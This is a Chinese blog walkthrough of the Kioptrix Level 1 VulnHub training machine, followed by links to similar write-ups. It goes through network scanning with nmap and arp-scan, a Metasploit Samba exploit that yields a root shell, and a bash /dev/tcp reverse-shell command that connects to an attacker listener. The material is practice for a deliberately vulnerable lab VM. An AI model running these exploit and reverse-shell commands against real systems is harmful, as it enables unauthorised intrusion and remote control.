vulnhub Kioptrix Level 1通关

最新推荐文章于 2024-04-29 00:03:03 发布
最新推荐文章于 2024-04-29 00:03:03 发布
阅读量304 收藏 9
点赞数 4
文章标签: 靶机通关 网络安全 信息收集 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80661529/article/details/137088660
版权
本文详细描述了如何在KioptrixLevel1靶机环境中进行环境安装、IP搜寻、端口扫描,利用Samba漏洞实现RCE,并通过反弹shell获取root权限的过程。作者还分享了一种推荐的通关方法,以及在其中遇到的一个问题。
摘要由CSDN通过智能技术生成

目录

环境安装

信息收集

0X01靶机IP搜寻

1.1ifconfig查看本机IP域

1.2.nmap搜寻IP

2.直接arp-scan指令查看IP

0X02端口扫描

0X03漏洞利用

反弹shell

另一种通关方法推荐

环境安装

靶机下载:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar

攻击机:kali2023

开始渗透!!!

信息收集

0X01靶机IP搜寻

1.1ifconfig查看本机IP域

1.2.nmap搜寻IP

2.直接arp-scan指令查看IP

arp-scan -l

0X02端口扫描

nmap -A -p- 192.168.232.129

发现Samba的绑定服务器的139端口,我们使用msf探测一下Samba的版本

msfconsole
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.232.129
run

0X03漏洞利用

msf搜索samba

search samba

 使用现成的

注意一下可以使用的版本为Samba 2.2.x - Bruteforce所以可以使用

再利用

set payload linux/x86/shell_bind_tcp
set rhosts 192.168.232.129
show options
run

成功rce,已经拿到root权限。

反弹shell

先监听攻击机kali端口1234

nc -lvp 1234

然后就是rce输入反弹shell命令(此处由于kali的IP写错了,多写了几次)

bash -i >& /dev/tcp/192.168.232.128/1234 0>&1

发现成功连接,反弹shell

另一种通关方法推荐

推文:https://www.cnblogs.com/jason-huawen/p/16950944.html

 但是我看在其中一步,没能成功getshell!

Yf3_te
关注
vulhub靶机通关) XXE LAB: 1
yang1234567898的博客
01-16 2828
靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip 信息收集: 主机IP:192.168.43.48 开放了80端口 目录扫描:发现robots.txt 查看robots.txt,发现admin.php,还有一个xxe目录 直接访问admin.php报404,应该是不在根目录 扫描192.168.43.48/xxe目录,发现admin.php 访问xxe,是一个登录页面,应该就是admin.php 尝试弱口令和注入无果...
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 885
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
Vulnhub-LazySysAdmin 通关指南
大方子
11-20 2173
背景 一个孤独和懒惰的系统管理员哭泣自己睡觉的故事 Difficulty:中等/初学者 Goal: ​ 1.教初学者一些基本的Linux枚举技巧 ​ 2.让自己更加熟悉Linux的服务配置,然后创造更多靶机给大家去学习 ​ 3.得到root权限&找到flag   信息收集 先试用nmap确定靶机的IP地址 nmap -sP 192.168.100.0/24 确定靶...
Vulnhub通关手册》——02 Lampiao
weixin_53801131的博客
12-08 1552
Vulnhub通关手册——02 Lampiao 背景概述: 下载地址为:https://www.vulnhub.com/entry/lampiao-1,249/ 本次的靶机ip为192.168.2.230 1. 信息收集 1.1 扫描目标主机IP 使用nmap进行活跃主机发现,使用命令nmap -sP 192.168.2.0/24,扫描结果如下。 └─$ sudo nmap -sP 192.168.2.0/24 Starting Nmap 7.91 ( https://nmap.org ) at 202
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3705
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
靶机通关 | vulhub-XXE靶机通关秘籍~
鱼溯的博客
09-20 662
vulhub-XXE靶机通关秘籍~
KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 541
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
Vulnhub系列-Kioptrix-Level-3
Yasso的博客
12-19 1335
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
vuInhub靶场实战系列-Kioptrix Level #1
最新发布
06-08
vuInhub靶场实战系列-Kioptrix Level #1
prime1--vulnhub靶场通关教程
m0_74402888的博客
04-29 2280
是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。如果你得到了任何正确的参数,就按照下面的步骤操作。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。之前扫到了ssh,http wordpress,那密码对应的是什么服务呢。在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。//查看location.txt文件,你将得到下一步的行动指示//vm 编辑--查看虚拟网络编辑器,看到靶机的网段。
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
qq_51577576的博客
03-05 1435
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
Vulnhub内网渗透Jangow01靶场通关,2024年最新看完直呼内行
04-15 480
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 9110
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2298
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
[网络安全学习篇42]:靶场环境搭建(ubuntu系统安装优化及vulhub安装)
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
04-19 5376
靶场 Ubuntu系统安装 Ubuntu 安装软件 开启SSH服务 修改配置文件 开启ssh服务 添加开机自启动 dnsmq 安装docker 安装docker-compose 启动坏境 搭建tomcat弱口令漏洞平台
vulhub靶场练习——Apache换行解析、多后缀解析、以及ssl远程命令执行漏洞分析
雷根瓦尔德
11-28 1214
Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。 [2] Apache HTTP服务器是一个模块化的服务器,源于NCSAhttpd服务器,经过多次修...
全流程+讲解+避坑指南 第一次使用vulhub搭建漏洞环境
热门推荐
luluoluoa的博客
04-03 3万+
vulhub介绍 vulhub是一个开源漏洞靶场,可以在安装 docker和docker-compose 后,使用简单的指令搭建漏洞环境,具体介绍可以看官网。可以安装在windows、linux上。 vulhub官网:https://vulhub.org/#/index/ docker介绍 docker意思就是容器,可以把我们配置好的环境等打包到这个容器里,使用的时候就可以直接使用它的镜像。这个容器可移植性强,很方便,有windows和linux版本。docker也有很多用法,但是我们这里是为了使用
Rhino Level 1 v4犀牛操作教程指南
Rhino Level 1 v4犀牛操作教程上部 Rhino Level 1 v4是Rhino操作教程的上部,旨在为用户提供基本的Rhino操作技能,包括界面介绍、基本操作、几何图形建立等内容。下面是根据文件内容生成的相关知识点: 1. Rhino...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值